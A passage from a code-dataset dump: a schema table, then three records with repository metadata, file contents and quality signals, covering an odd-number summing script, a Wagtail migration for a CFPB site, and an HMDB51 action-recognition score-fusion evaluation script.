Fields and data types:

| field | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
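Each qsc_* name appears twice: once with a _quality_signal suffix, holding the computed value, and once without the suffix, holding what appear to be 0/1 (or null) indicators recorded alongside it in the example records below. As a purely illustrative sketch of working with rows shaped like this, the snippet below streams records and filters on two of the duplication signals; the dataset path and the thresholds are placeholders, not values taken from this document.

```python
# Illustrative only: "path/to/code-dataset" is a placeholder, and the 0.5
# thresholds are arbitrary examples.
from datasets import load_dataset  # Hugging Face `datasets` library

ds = load_dataset("path/to/code-dataset", split="train", streaming=True)

def looks_repetitive(row):
    # High duplicated-n-gram and duplicated-line fractions suggest
    # boilerplate or copy-pasted code (compare the first record below).
    dupe_10 = row["qsc_code_frac_chars_dupe_10grams_quality_signal"] or 0.0
    dupe_lines = row["qsc_code_frac_lines_dupe_lines_quality_signal"] or 0.0
    return dupe_10 > 0.5 or dupe_lines > 0.5

for row in ds.take(100):
    if not looks_repetitive(row):
        print(row["max_stars_repo_name"], row["max_stars_repo_path"], row["size"])
```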
Record 1 metadata:

| field | value |
|---|---|
| hexsha | b6b31e8256a11d3ae22f7859c3d2127f0a7ba4e7 |
| size | 588 |
| ext | py |
| lang | Python |
| max_stars_repo_path | add-ten-odd-numbers.py |
| max_stars_repo_name | Omi0604/DCU-Einstein- |
| max_stars_repo_head_hexsha | b35e2657b8e27904035e881021c9bdf9e51675bb |
| max_stars_repo_licenses | ["MIT"] |
| max_stars_count | null |
| max_stars_repo_stars_event_min_datetime | null |
| max_stars_repo_stars_event_max_datetime | null |
| max_issues_repo_path | add-ten-odd-numbers.py |
| max_issues_repo_name | Omi0604/DCU-Einstein- |
| max_issues_repo_head_hexsha | b35e2657b8e27904035e881021c9bdf9e51675bb |
| max_issues_repo_licenses | ["MIT"] |
| max_issues_count | null |
| max_issues_repo_issues_event_min_datetime | null |
| max_issues_repo_issues_event_max_datetime | null |
| max_forks_repo_path | add-ten-odd-numbers.py |
| max_forks_repo_name | Omi0604/DCU-Einstein- |
| max_forks_repo_head_hexsha | b35e2657b8e27904035e881021c9bdf9e51675bb |
| max_forks_repo_licenses | ["MIT"] |
| max_forks_count | null |
| max_forks_repo_forks_event_min_datetime | null |
| max_forks_repo_forks_event_max_datetime | null |

content (add-ten-odd-numbers.py, reproduced verbatim):
#!/usr/bin/env python3
total = 0
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
n = int(input())
n = (n * (n % 2))
total = total + n
print(total)
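The file above repeats the same three-line read/mask/accumulate pattern ten times, which is what drives the very high duplicate-line and duplicated-n-gram signals reported below. For clarity only (this is not part of the stored record), an equivalent loop-based version would be:

```python
#!/usr/bin/env python3
# Read ten integers and sum only the odd ones:
# n * (n % 2) equals n when n is odd and 0 when n is even.
total = 0
for _ in range(10):
    n = int(input())
    total += n * (n % 2)
print(total)
```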
Per-file statistics for record 1:

| field | value |
|---|---|
| avg_line_length | 12.782609 |
| max_line_length | 22 |
| alphanum_fraction | 0.462585 |
| effective | 0 |
| hits | 10 |

Quality signals for record 1, pairing each *_quality_signal value with the unsuffixed column of the same base name:

| signal (base name) | *_quality_signal | unsuffixed |
|---|---|---|
| qsc_code_num_words | 108 | 0 |
| qsc_code_num_chars | 588 | 0 |
| qsc_code_mean_word_length | 2.518519 | 0 |
| qsc_code_frac_words_unique | 0.101852 | null |
| qsc_code_frac_chars_top_2grams | 0.213235 | 1 |
| qsc_code_frac_chars_top_3grams | 0.330882 | 1 |
| qsc_code_frac_chars_top_4grams | 0.367647 | 1 |
| qsc_code_frac_chars_dupe_5grams | 0.882353 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.882353 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.882353 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.882353 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.882353 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.882353 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.028571 | 0 |
| qsc_code_frac_chars_whitespace | 0.285714 | 0 |
| qsc_code_size_file_byte | 588 | 0 |
| qsc_code_num_lines | 45 | 0 |
| qsc_code_num_chars_line_max | 23 | 0 |
| qsc_code_num_chars_line_mean | 13.066667 | 0 |
| qsc_code_frac_chars_alphabet | 0.619048 | 0 |
| qsc_code_frac_chars_comments | 0.035714 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.9375 | 1 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0 | 0 |
| qsc_codepython_frac_lines_print | 0.03125 | 0 |
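The simpler character- and line-level signals can be approximated directly from the content field; the exact definitions used to produce the values in this dump are not given here, so the sketch below is only an approximation for orientation.

```python
# Rough re-computation of two simple signals from a record's "content" field.
# These are illustrative approximations, not the pipeline's exact definitions.
def frac_chars_whitespace(text: str) -> float:
    """Fraction of characters that are whitespace."""
    return sum(c.isspace() for c in text) / max(len(text), 1)

def frac_lines_dupe_lines(text: str) -> float:
    """Fraction of non-empty lines that are duplicates of an earlier line."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    if not lines:
        return 0.0
    return (len(lines) - len(set(lines))) / len(lines)

# Usage: frac_chars_whitespace(row["content"]), frac_lines_dupe_lines(row["content"])
```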
Record 2 metadata:

| field | value |
|---|---|
| hexsha | fcc53c557e0c8d42430fc3705bf5595b5e329f24 |
| size | 7,083 |
| ext | py |
| lang | Python |
| max_stars_repo_path | cfgov/ask_cfpb/migrations/0015_update_email_signup_options.py |
| max_stars_repo_name | higs4281/cfgov-refresh |
| max_stars_repo_head_hexsha | a02b193fb2373d443265c21845adf8a196e05675 |
| max_stars_repo_licenses | ["CC0-1.0"] |
| max_stars_count | 1 |
| max_stars_repo_stars_event_min_datetime | 2019-11-26T20:18:22.000Z |
| max_stars_repo_stars_event_max_datetime | 2019-11-26T20:18:22.000Z |
| max_issues_repo_path | cfgov/ask_cfpb/migrations/0015_update_email_signup_options.py |
| max_issues_repo_name | higs4281/cfgov-refresh |
| max_issues_repo_head_hexsha | a02b193fb2373d443265c21845adf8a196e05675 |
| max_issues_repo_licenses | ["CC0-1.0"] |
| max_issues_count | 8 |
| max_issues_repo_issues_event_min_datetime | 2021-03-11T00:55:51.000Z |
| max_issues_repo_issues_event_max_datetime | 2022-02-13T21:10:14.000Z |
| max_forks_repo_path | cfgov/ask_cfpb/migrations/0015_update_email_signup_options.py |
| max_forks_repo_name | higs4281/cfgov-refresh |
| max_forks_repo_head_hexsha | a02b193fb2373d443265c21845adf8a196e05675 |
| max_forks_repo_licenses | ["CC0-1.0"] |
| max_forks_count | 1 |
| max_forks_repo_forks_event_min_datetime | 2019-12-28T14:04:07.000Z |
| max_forks_repo_forks_event_max_datetime | 2019-12-28T14:04:07.000Z |

content (cfgov/ask_cfpb/migrations/0015_update_email_signup_options.py, reproduced verbatim):
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import wagtail.wagtailcore.fields
import wagtail.wagtailsnippets.blocks
import v1.blocks
import v1.models.snippets
import wagtail.wagtailcore.blocks
class Migration(migrations.Migration):
dependencies = [
('ask_cfpb', '0014_recreated_2'),
]
operations = [
migrations.AlterField(
model_name='answerpage',
name='sidebar',
field=wagtail.wagtailcore.fields.StreamField([('call_to_action', wagtail.wagtailcore.blocks.StructBlock([(b'slug_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'paragraph_text', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'button', wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False)), (b'size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[(b'regular', b'Regular'), (b'large', b'Large Primary')]))]))])), ('related_links', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'paragraph', wagtail.wagtailcore.blocks.RichTextBlock(required=False)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])))])), ('related_metadata', wagtail.wagtailcore.blocks.StructBlock([(b'slug', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'content', wagtail.wagtailcore.blocks.StreamBlock([(b'text', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'blob', wagtail.wagtailcore.blocks.RichTextBlock())], icon=b'pilcrow')), (b'list', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'links', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'url', wagtail.wagtailcore.blocks.CharBlock(default=b'/', required=False))])))], icon=b'list-ul')), (b'date', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(max_length=100)), (b'date', wagtail.wagtailcore.blocks.DateBlock())], icon=b'date')), (b'topics', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(default=b'Topics', max_length=100)), (b'show_topics', wagtail.wagtailcore.blocks.BooleanBlock(default=True, required=False))], icon=b'tag'))])), (b'is_half_width', wagtail.wagtailcore.blocks.BooleanBlock(default=False, required=False))])), ('email_signup', wagtail.wagtailcore.blocks.StructBlock([(b'heading', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'default_heading', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'If selected, heading will be styled as an H5 with green top rule. Deselect to style header as H3.', default=True, required=False, label=b'Default heading style')), (b'text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'gd_code', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'form_field', wagtail.wagtailcore.blocks.ListBlock(wagtail.wagtailcore.blocks.StructBlock([(b'btn_text', wagtail.wagtailcore.blocks.CharBlock(required=False)), (b'required', wagtail.wagtailcore.blocks.BooleanBlock(required=False)), (b'info', wagtail.wagtailcore.blocks.RichTextBlock(required=False, label=b'Disclaimer')), (b'inline_info', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Show disclaimer on same line as button. 
Only select this option if the disclaimer text is a few words (ie, "Privacy Act statement") rather than a full sentence.', required=False, label=b'Inline disclaimer')), (b'label', wagtail.wagtailcore.blocks.CharBlock(required=True)), (b'type', wagtail.wagtailcore.blocks.ChoiceBlock(required=False, choices=[(b'text', b'Text'), (b'checkbox', b'Checkbox'), (b'email', b'Email'), (b'number', b'Number'), (b'url', b'URL'), (b'radio', b'Radio')])), (b'placeholder', wagtail.wagtailcore.blocks.CharBlock(required=False))]), required=False, icon=b'mail'))])), ('sidebar_contact', wagtail.wagtailcore.blocks.StructBlock([(b'contact', wagtail.wagtailsnippets.blocks.SnippetChooserBlock(b'v1.Contact')), (b'has_top_rule_line', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'Add a horizontal rule line to top of contact block.', default=False, required=False))])), ('rss_feed', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[(b'blog_feed', b'Blog Feed'), (b'newsroom_feed', b'Newsroom Feed')])), ('social_media', wagtail.wagtailcore.blocks.StructBlock([(b'is_share_view', wagtail.wagtailcore.blocks.BooleanBlock(help_text=b'If unchecked, social media icons will link users to official CFPB accounts. Do not fill in any further fields.', default=True, required=False, label=b'Desired action: share this page')), (b'blurb', wagtail.wagtailcore.blocks.CharBlock(help_text=b'Sets the tweet text, email subject line, and LinkedIn post text.', default=b"Look what I found on the CFPB's site!", required=False)), (b'twitter_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom text for Twitter shares. If blank, will default to value of blurb field above.', max_length=100, required=False)), (b'twitter_related', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) A comma-separated list of accounts related to the content of the shared URL. Do not enter the @ symbol. If blank, it will default to just "cfpb".', required=False)), (b'twitter_hashtags', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) A comma-separated list of hashtags to be appended to default tweet text.', required=False)), (b'twitter_lang', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Loads text components in the specified language, if other than English. E.g., use "es" for Spanish. See https://dev.twitter.com/web/overview/languages for a list of supported language codes.', required=False)), (b'email_title', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom subject for email shares. If blank, will default to value of blurb field above.', required=False)), (b'email_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom text for email shares. If blank, will default to "Check out this page from the CFPB".', required=False)), (b'email_signature', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Adds a custom signature line to email shares. ', required=False)), (b'linkedin_title', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom title for LinkedIn shares. If blank, will default to value of blurb field above.', required=False)), (b'linkedin_text', wagtail.wagtailcore.blocks.CharBlock(help_text=b'(Optional) Custom text for LinkedIn shares.', required=False))])), ('reusable_text', v1.blocks.ReusableTextChooserBlock(v1.models.snippets.ReusableText))], blank=True),
),
]
Per-file statistics for record 2:

| field | value |
|---|---|
| avg_line_length | 283.32 |
| max_line_length | 6,583 |
| alphanum_fraction | 0.770295 |
| effective | 0 |
| hits | 8 |

Quality signals for record 2, pairing each *_quality_signal value with the unsuffixed column of the same base name:

| signal (base name) | *_quality_signal | unsuffixed |
|---|---|---|
| qsc_code_num_words | 955 | 0 |
| qsc_code_num_chars | 7,083 | 0 |
| qsc_code_mean_word_length | 5.646073 | 0 |
| qsc_code_frac_words_unique | 0.231414 | null |
| qsc_code_frac_chars_top_2grams | 0.216988 | 1 |
| qsc_code_frac_chars_top_3grams | 0.280415 | 1 |
| qsc_code_frac_chars_top_4grams | 0.177485 | 1 |
| qsc_code_frac_chars_dupe_5grams | 0.563056 | 0 |
| qsc_code_frac_chars_dupe_6grams | 0.519102 | 0 |
| qsc_code_frac_chars_dupe_7grams | 0.457901 | 0 |
| qsc_code_frac_chars_dupe_8grams | 0.405972 | 0 |
| qsc_code_frac_chars_dupe_9grams | 0.331973 | 0 |
| qsc_code_frac_chars_dupe_10grams | 0.309533 | 0 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.004726 | 0 |
| qsc_code_frac_chars_whitespace | 0.073839 | 0 |
| qsc_code_size_file_byte | 7,083 | 0 |
| qsc_code_num_lines | 24 | 0 |
| qsc_code_num_chars_line_max | 6,584 | 1 |
| qsc_code_num_chars_line_mean | 295.125 | 1 |
| qsc_code_frac_chars_alphabet | 0.817226 | 0 |
| qsc_code_frac_chars_comments | 0.002965 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0.5 | 1 |
| qsc_code_frac_chars_string_length | 0.323371 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.388889 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 1 |
| qsc_codepython_score_lines_no_logic | 0.555556 | 0 |
| qsc_codepython_frac_lines_print | 0 | 1 |
Record 3 metadata:

| field | value |
|---|---|
| hexsha | fce8cf685129513bc5965c7454d43284cebad81d |
| size | 5,756 |
| ext | py |
| lang | Python |
| max_stars_repo_path | eval_hmdb.py |
| max_stars_repo_name | Ewenwan/DTPP |
| max_stars_repo_head_hexsha | 0a10dd8c61596d5326fbbe70dcac0eae59088c27 |
| max_stars_repo_licenses | ["BSD-2-Clause"] |
| max_stars_count | 1 |
| max_stars_repo_stars_event_min_datetime | 2019-05-07T01:00:18.000Z |
| max_stars_repo_stars_event_max_datetime | 2019-05-07T01:00:18.000Z |
| max_issues_repo_path | eval_hmdb.py |
| max_issues_repo_name | Ewenwan/DTPP |
| max_issues_repo_head_hexsha | 0a10dd8c61596d5326fbbe70dcac0eae59088c27 |
| max_issues_repo_licenses | ["BSD-2-Clause"] |
| max_issues_count | null |
| max_issues_repo_issues_event_min_datetime | null |
| max_issues_repo_issues_event_max_datetime | null |
| max_forks_repo_path | eval_hmdb.py |
| max_forks_repo_name | Ewenwan/DTPP |
| max_forks_repo_head_hexsha | 0a10dd8c61596d5326fbbe70dcac0eae59088c27 |
| max_forks_repo_licenses | ["BSD-2-Clause"] |
| max_forks_count | 1 |
| max_forks_repo_forks_event_min_datetime | 2019-09-18T05:27:50.000Z |
| max_forks_repo_forks_event_max_datetime | 2019-09-18T05:27:50.000Z |

content (eval_hmdb.py, reproduced verbatim):
import argparse
import sys
import numpy as np
import scipy.io as sio
from pyActionRecog.utils.video_funcs import default_aggregation_func
from pyActionRecog.utils.metrics import mean_class_accuracy, class_accuracy
def get_score(score_files, xxxx = 0.4):
crop_agg = "mean"
score_npz_files = [np.load(x) for x in score_files]
score_list = [x['scores'][:, 0] for x in score_npz_files]
label_list = [x['labels'] for x in score_npz_files]
agg_score_list = []
for score_vec in score_list:
agg_score_vec = [default_aggregation_func(x, normalization=False, crop_agg=getattr(np, crop_agg)) for x in
score_vec]
agg_score_list.append(np.array(agg_score_vec))
split = score_files[0].split("_")[2]
score_weights = [xxxx, 1.0 - xxxx]
if score_weights is None:
score_weights = [1] * len(score_npz_files)
else:
score_weights = score_weights
if len(score_weights) != len(score_npz_files):
raise ValueError("Only {} weight specifed for a total of {} score files"
.format(len(score_weights), len(score_npz_files)))
final_scores = np.zeros_like(agg_score_list[0])
for i, agg_score in enumerate(agg_score_list):
final_scores += agg_score * score_weights[i]
print "split: ", split
ff = [x[0][0] for x in final_scores]
return ff, label_list[0]
def get_score_11111(score_files, xxxx = 0.4):
crop_agg = "mean"
score_npz_files = [np.load(x) for x in score_files]
score_list = [x['scores'][:, 0] for x in score_npz_files]
label_list = [x['labels'] for x in score_npz_files]
agg_score_list = []
for score_vec in score_list:
agg_score_vec = [default_aggregation_func(x, normalization=False, crop_agg=getattr(np, crop_agg)) for x in
score_vec]
agg_score_list.append(np.array(agg_score_vec))
split = score_files[0].split("_")[2]
score_weights = [xxxx, 1.0 - xxxx]
if score_weights is None:
score_weights = [1] * len(score_npz_files)
else:
score_weights = score_weights
if len(score_weights) != len(score_npz_files):
raise ValueError("Only {} weight specifed for a total of {} score files"
.format(len(score_weights), len(score_npz_files)))
final_scores = np.zeros_like(agg_score_list[0])
for i, agg_score in enumerate(agg_score_list):
final_scores += agg_score * score_weights[i]
print "split: ", split
ff = [x[0][0] for x in final_scores]
acc = mean_class_accuracy(ff, label_list[0])
# print 'Final accuracy {:02f}%'.format(acc * 100)
# print "rgb_score_weight: ", xxxx
# print "\n"
return acc
#
# # score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_new_score.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_new_score.npz'] ### 0.86
# score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_swing_baseball.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_swing_baseball.npz']
# score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_draw_sword.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_draw_sword.npz']
score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_cart_wheel.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_cart_wheel.npz']
ff, ll = get_score(score_files)
#
# # score_files = ['hmdb51_split_1_tsn_flow_reference_bn_inception_new_sit.npz', 'hmdb51_split_1_tsn_rgb_reference_bn_inception_new_sit.npz']
# score_files = ['hmdb51_split_1_tsn_rgb_reference_bn_inception_new_swing_baseball.npz', 'hmdb51_split_1_tsn_flow_reference_bn_inception_new_swing_baseball.npz']
# score_files = ['hmdb51_split_1_tsn_rgb_reference_bn_inception_new_draw_sword.npz', 'hmdb51_split_1_tsn_flow_reference_bn_inception_new_draw_sword.npz']
score_files = ['hmdb51_split_1_tsn_flow_reference_bn_inception_new_cart_wheel.npz', 'hmdb51_split_1_tsn_rgb_reference_bn_inception_new_cart_wheel.npz']
ff1, ll = get_score(score_files, xxxx=0.5)
#
acc, iiiii = class_accuracy(ff, ff1, ll)
# print 'Final accuracy {:02f}%'.format(acc * 100)
# print "rgb_score_weight: ", xxxx
# print "\n"
# score_files = ["hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112.npz", "hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672.npz"]
# score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_swing_baseball.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_swing_baseball.npz']
# score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_draw_sword.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_draw_sword.npz']
# score_files = ['hmdb51_split_1_rgb_tpp_delete_dropout_lr_0.0001_iter_112_cart_wheel.npz', 'hmdb51_split_1_flow_tpp_delete_dropout_lr_0.0001_iter_672_cart_wheel.npz']
# acc_1 = get_score_11111(score_files)
# score_files = ["hmdb51_split_1_tsn_rgb_reference_bn_inception_new.npz", "hmdb51_split_1_tsn_flow_reference_bn_inception_new.npz"]
# score_files = ['hmdb51_split_1_tsn_rgb_reference_bn_inception_new_swing_baseball.npz', 'hmdb51_split_1_tsn_flow_reference_bn_inception_new_swing_baseball.npz']
# score_files = ['hmdb51_split_1_tsn_rgb_reference_bn_inception_new_draw_sword.npz', 'hmdb51_split_1_tsn_flow_reference_bn_inception_new_draw_sword.npz']
score_files = ['hmdb51_split_1_tsn_flow_reference_bn_inception_new_cart_wheel.npz', 'hmdb51_split_1_tsn_rgb_reference_bn_inception_new_cart_wheel.npz']
acc_2 = get_score_11111(score_files, xxxx=0.5)
#
# dev = acc_1 - acc_2
#
#
# def rr(nn1):
# res = np.argsort(-nn1)
# seq = nn1[res]
# return res, seq
#
# ax, axx = rr(dev)
#
# print dev
Per-file statistics for record 3:

| field | value |
|---|---|
| avg_line_length | 50.491228 |
| max_line_length | 177 |
| alphanum_fraction | 0.759555 |
| effective | 0 |
| hits | 8 |

Quality signals for record 3, pairing each *_quality_signal value with the unsuffixed column of the same base name:

| signal (base name) | *_quality_signal | unsuffixed |
|---|---|---|
| qsc_code_num_words | 943 | 0 |
| qsc_code_num_chars | 5,756 | 0 |
| qsc_code_mean_word_length | 4.112407 | 0 |
| qsc_code_frac_words_unique | 0.11877 | null |
| qsc_code_frac_chars_top_2grams | 0.090768 | 0 |
| qsc_code_frac_chars_top_3grams | 0.09902 | 0 |
| qsc_code_frac_chars_top_4grams | 0.086643 | 0 |
